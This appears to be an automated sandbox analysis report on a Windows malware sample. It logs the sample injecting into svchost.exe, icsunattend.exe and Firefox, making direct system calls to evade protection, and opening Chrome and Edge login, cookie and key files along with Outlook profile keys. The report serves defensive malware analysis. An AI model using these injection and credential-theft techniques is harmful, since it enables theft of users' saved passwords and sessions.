                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0325A470 mov eax, dword ptr fs:[00000030h]4_2_0325A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0325A470 mov eax, dword ptr fs:[00000030h]4_2_0325A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0325A470 mov eax, dword ptr fs:[00000030h]4_2_0325A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0326E443 mov eax, dword ptr fs:[00000030h]4_2_0326E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0326E443 mov eax, dword ptr fs:[00000030h]4_2_0326E443
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0326E443 mov eax, dword ptr fs:[00000030h] 4_2_0326E443
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_032EA456 mov eax, dword ptr fs:[00000030h] 4_2_032EA456
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0322645D mov eax, dword ptr fs:[00000030h] 4_2_0322645D
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0325245A mov eax, dword ptr fs:[00000030h] 4_2_0325245A
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_032364AB mov eax, dword ptr fs:[00000030h] 4_2_032364AB
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_032644B0 mov ecx, dword ptr fs:[00000030h] 4_2_032644B0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_032BA4B0 mov eax, dword ptr fs:[00000030h] 4_2_032BA4B0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_032EA49A mov eax, dword ptr fs:[00000030h] 4_2_032EA49A
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_032304E5 mov ecx, dword ptr fs:[00000030h] 4_2_032304E5
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0325EB20 mov eax, dword ptr fs:[00000030h] 4_2_0325EB20
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_032F8B28 mov eax, dword ptr fs:[00000030h] 4_2_032F8B28
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03304B00 mov eax, dword ptr fs:[00000030h] 4_2_03304B00
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_032AEB1D mov eax, dword ptr fs:[00000030h] 4_2_032AEB1D
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0322CB7E mov eax, dword ptr fs:[00000030h] 4_2_0322CB7E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_032E4B4B mov eax, dword ptr fs:[00000030h] 4_2_032E4B4B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03302B57 mov eax, dword ptr fs:[00000030h] 4_2_03302B57
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_032C6B40 mov eax, dword ptr fs:[00000030h] 4_2_032C6B40
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_032D8B42 mov eax, dword ptr fs:[00000030h] 4_2_032D8B42
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_032FAB40 mov eax, dword ptr fs:[00000030h] 4_2_032FAB40
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03228B50 mov eax, dword ptr fs:[00000030h] 4_2_03228B50
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_032DEB50 mov eax, dword ptr fs:[00000030h] 4_2_032DEB50
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03240BBE mov eax, dword ptr fs:[00000030h] 4_2_03240BBE
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_032E4BB0 mov eax, dword ptr fs:[00000030h] 4_2_032E4BB0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03238BF0 mov eax, dword ptr fs:[00000030h] 4_2_03238BF0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0325EBFC mov eax, dword ptr fs:[00000030h] 4_2_0325EBFC
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_032BCBF0 mov eax, dword ptr fs:[00000030h] 4_2_032BCBF0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03250BCB mov eax, dword ptr fs:[00000030h] 4_2_03250BCB
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03230BCD mov eax, dword ptr fs:[00000030h] 4_2_03230BCD
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_032DEBD0 mov eax, dword ptr fs:[00000030h] 4_2_032DEBD0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0326CA24 mov eax, dword ptr fs:[00000030h] 4_2_0326CA24
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0325EA2E mov eax, dword ptr fs:[00000030h] 4_2_0325EA2E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03254A35 mov eax, dword ptr fs:[00000030h] 4_2_03254A35
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0326CA38 mov eax, dword ptr fs:[00000030h] 4_2_0326CA38
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_032BCA11 mov eax, dword ptr fs:[00000030h] 4_2_032BCA11
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0326CA6F mov eax, dword ptr fs:[00000030h] 4_2_0326CA6F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_032DEA60 mov eax, dword ptr fs:[00000030h] 4_2_032DEA60
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_032ACA72 mov eax, dword ptr fs:[00000030h] 4_2_032ACA72
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03236A50 mov eax, dword ptr fs:[00000030h] 4_2_03236A50
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03240A5B mov eax, dword ptr fs:[00000030h] 4_2_03240A5B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03238AA0 mov eax, dword ptr fs:[00000030h] 4_2_03238AA0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03286AA4 mov eax, dword ptr fs:[00000030h] 4_2_03286AA4
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0323EA80 mov eax, dword ptr fs:[00000030h] 4_2_0323EA80
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03304A80 mov eax, dword ptr fs:[00000030h] 4_2_03304A80
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03268A90 mov edx, dword ptr fs:[00000030h] 4_2_03268A90
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0326AAEE mov eax, dword ptr fs:[00000030h] 4_2_0326AAEE
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03286ACC mov eax, dword ptr fs:[00000030h] 4_2_03286ACC
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03230AD0 mov eax, dword ptr fs:[00000030h] 4_2_03230AD0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03264AD0 mov eax, dword ptr fs:[00000030h] 4_2_03264AD0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_032B892A mov eax, dword ptr fs:[00000030h] 4_2_032B892A
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_032C892B mov eax, dword ptr fs:[00000030h] 4_2_032C892B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_032AE908 mov eax, dword ptr fs:[00000030h] 4_2_032AE908
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_032BC912 mov eax, dword ptr fs:[00000030h] 4_2_032BC912
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03228918 mov eax, dword ptr fs:[00000030h] 4_2_03228918
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03256962 mov eax, dword ptr fs:[00000030h] 4_2_03256962
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0327096E mov eax, dword ptr fs:[00000030h] 4_2_0327096E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0327096E mov edx, dword ptr fs:[00000030h] 4_2_0327096E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_032D4978 mov eax, dword ptr fs:[00000030h] 4_2_032D4978
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_032BC97C mov eax, dword ptr fs:[00000030h] 4_2_032BC97C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_032B0946 mov eax, dword ptr fs:[00000030h] 4_2_032B0946
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03304940 mov eax, dword ptr fs:[00000030h] 4_2_03304940
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_032429A0 mov eax, dword ptr fs:[00000030h] 4_2_032429A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_032309AD mov eax, dword ptr fs:[00000030h] 4_2_032309AD
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_032B89B3 mov esi, dword ptr fs:[00000030h] 4_2_032B89B3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_032B89B3 mov eax, dword ptr fs:[00000030h] 4_2_032B89B3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_032BE9E0 mov eax, dword ptr fs:[00000030h] 4_2_032BE9E0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_032629F9 mov eax, dword ptr fs:[00000030h] 4_2_032629F9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_032C69C0 mov eax, dword ptr fs:[00000030h] 4_2_032C69C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0323A9D0 mov eax, dword ptr fs:[00000030h] 4_2_0323A9D0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_032649D0 mov eax, dword ptr fs:[00000030h] 4_2_032649D0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_032FA9D3 mov eax, dword ptr fs:[00000030h] 4_2_032FA9D3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03252835 mov eax, dword ptr fs:[00000030h] 4_2_03252835
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03252835 mov ecx, dword ptr fs:[00000030h] 4_2_03252835
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0326A830 mov eax, dword ptr fs:[00000030h] 4_2_0326A830
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_032D483A mov eax, dword ptr fs:[00000030h] 4_2_032D483A
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_032BC810 mov eax, dword ptr fs:[00000030h] 4_2_032BC810
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_032BE872 mov eax, dword ptr fs:[00000030h] 4_2_032BE872
                Source: C:\Users\user\Desktop\VSP469620.exe Code function: 2_2_00AEA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 2_2_00AEA66C
                Source: C:\Users\user\Desktop\VSP469620.exe Code function: 2_2_00AD81AC SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_00AD81AC
                Source: C:\Users\user\Desktop\VSP469620.exe Code function: 2_2_00AD8189 SetUnhandledExceptionFilter, 2_2_00AD8189

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe NtOpenKeyEx: Direct from: 0x77672B9C
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe NtProtectVirtualMemory: Direct from: 0x77672F9C
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe NtCreateFile: Direct from: 0x77672FEC
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe NtOpenFile: Direct from: 0x77672DCC
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe NtTerminateThread: Direct from: 0x77672FCC
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe NtProtectVirtualMemory: Direct from: 0x77667B2E
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe NtQueryInformationToken: Direct from: 0x77672CAC
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe NtAllocateVirtualMemory: Direct from: 0x77672BEC
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe NtDeviceIoControlFile: Direct from: 0x77672AEC
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe NtQuerySystemInformation: Direct from: 0x776748CC
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe NtQueryAttributesFile: Direct from: 0x77672E6C
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe NtSetInformationThread: Direct from: 0x77672B4C
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe NtOpenSection: Direct from: 0x77672E0C
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe NtQueryVolumeInformationFile: Direct from: 0x77672F2C
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe NtAllocateVirtualMemory: Direct from: 0x776748EC
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe NtSetInformationThread: Direct from: 0x776663F9
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe NtReadVirtualMemory: Direct from: 0x77672E8C
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe NtCreateKey: Direct from: 0x77672C6C
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe NtClose: Direct from: 0x77672B6C
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe NtWriteVirtualMemory: Direct from: 0x7767490C
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe NtAllocateVirtualMemory: Direct from: 0x77673C9C
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe NtDelayExecution: Direct from: 0x77672DDC
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe NtCreateUserProcess: Direct from: 0x7767371C
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe NtQuerySystemInformation: Direct from: 0x77672DFC
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe NtQueryInformationProcess: Direct from: 0x77672C26
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe NtResumeThread: Direct from: 0x77672FBC
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe NtReadFile: Direct from: 0x77672ADC
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe NtAllocateVirtualMemory: Direct from: 0x77672BFC
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe NtResumeThread: Direct from: 0x776736AC
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe NtSetInformationProcess: Direct from: 0x77672C5C
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe NtMapViewOfSection: Direct from: 0x77672D1C
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe NtNotifyChangeKey: Direct from: 0x77673C2C
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe NtWriteVirtualMemory: Direct from: 0x77672E3C
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe NtCreateMutant: Direct from: 0x776735CC
                Source: C:\Users\user\Desktop\VSP469620.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\SysWOW64\icsunattend.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\icsunattend.exe Section loaded: NULL target: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe protection: read write
                Source: C:\Windows\SysWOW64\icsunattend.exe Section loaded: NULL target: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\icsunattend.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\icsunattend.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\icsunattend.exe Thread register set: target process: 1516
                Source: C:\Windows\SysWOW64\icsunattend.exe Thread APC queued: target process: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe
                Source: C:\Users\user\Desktop\VSP469620.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 5E2008
                Source: C:\Users\user\Desktop\VSP469620.exe Code function: 2_2_00AEB106 LogonUserW, 2_2_00AEB106
                Source: C:\Users\user\Desktop\VSP469620.exe Code function: 2_2_00AB3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 2_2_00AB3D19
                Source: C:\Users\user\Desktop\VSP469620.exe Code function: 2_2_00AF411C SendInput,keybd_event, 2_2_00AF411C
                Source: C:\Users\user\Desktop\VSP469620.exe Code function: 2_2_00AF74BB mouse_event, 2_2_00AF74BB
                Source: C:\Users\user\Desktop\VSP469620.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\VSP469620.exe"
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe Process created: C:\Windows\SysWOW64\icsunattend.exe "C:\Windows\SysWOW64\icsunattend.exe"
                Source: C:\Windows\SysWOW64\icsunattend.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\VSP469620.exe Code function: 2_2_00AEA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 2_2_00AEA66C
                Source: C:\Users\user\Desktop\VSP469620.exe Code function: 2_2_00AF71FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 2_2_00AF71FA
                Source: VSP469620.exe, VgGNmkZfWSSE.exe, 00000006.00000002.3144032429.0000000001080000.00000002.00000001.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 00000006.00000000.1738557841.0000000001081000.00000002.00000001.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3143890567.0000000001430000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
                Source: VgGNmkZfWSSE.exe, 00000006.00000002.3144032429.0000000001080000.00000002.00000001.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 00000006.00000000.1738557841.0000000001081000.00000002.00000001.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3143890567.0000000001430000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
                Source: VgGNmkZfWSSE.exe, 00000006.00000002.3144032429.0000000001080000.00000002.00000001.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 00000006.00000000.1738557841.0000000001081000.00000002.00000001.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3143890567.0000000001430000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: EProgram Manager
                Source: VSP469620.exe Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                Source: VgGNmkZfWSSE.exe, 00000006.00000002.3144032429.0000000001080000.00000002.00000001.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 00000006.00000000.1738557841.0000000001081000.00000002.00000001.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3143890567.0000000001430000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\VSP469620.exe Code function: 2_2_00AD65C4 cpuid 2_2_00AD65C4
                Source: C:\Users\user\Desktop\VSP469620.exe Code function: 2_2_00B0091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW, 2_2_00B0091D
                Source: C:\Users\user\Desktop\VSP469620.exe Code function: 2_2_00B2B340 GetUserNameW, 2_2_00B2B340
                Source: C:\Users\user\Desktop\VSP469620.exe Code function: 2_2_00AE1E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 2_2_00AE1E8E
                Source: C:\Users\user\Desktop\VSP469620.exe Code function: 2_2_00ACDDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo, 2_2_00ACDDC0

                Stealing of Sensitive Information

Source: Yara match; File source: 4.2.svchost.exe.6d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.svchost.exe.6d0000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0000000A.00000002.3143475754.0000000001160000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.1818834622.0000000000F60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.3143800375.0000000002990000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.1818515426.00000000006D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.3141775321.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.1819214372.0000000005350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.3144417314.0000000004490000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.3143584340.0000000002940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\icsunattend.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\icsunattend.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\icsunattend.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\icsunattend.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\icsunattend.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\icsunattend.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\icsunattend.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\icsunattend.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\icsunattend.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: VSP469620.exe; Binary or memory string: WIN_81
Source: VSP469620.exe; Binary or memory string: WIN_XP
Source: VSP469620.exe; Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
Source: VSP469620.exe; Binary or memory string: WIN_XPe
Source: VSP469620.exe; Binary or memory string: WIN_VISTA
Source: VSP469620.exe; Binary or memory string: WIN_7
Source: VSP469620.exe; Binary or memory string: WIN_8

                Remote Access Functionality

Source: Yara match; File source: 4.2.svchost.exe.6d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.svchost.exe.6d0000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0000000A.00000002.3143475754.0000000001160000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.1818834622.0000000000F60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.3143800375.0000000002990000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.1818515426.00000000006D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.3141775321.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.1819214372.0000000005350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.3144417314.0000000004490000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.3143584340.0000000002940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\VSP469620.exe; Code function: 2_2_00B08C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,2_2_00B08C4F
Source: C:\Users\user\Desktop\VSP469620.exe; Code function: 2_2_00B0923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,2_2_00B0923B
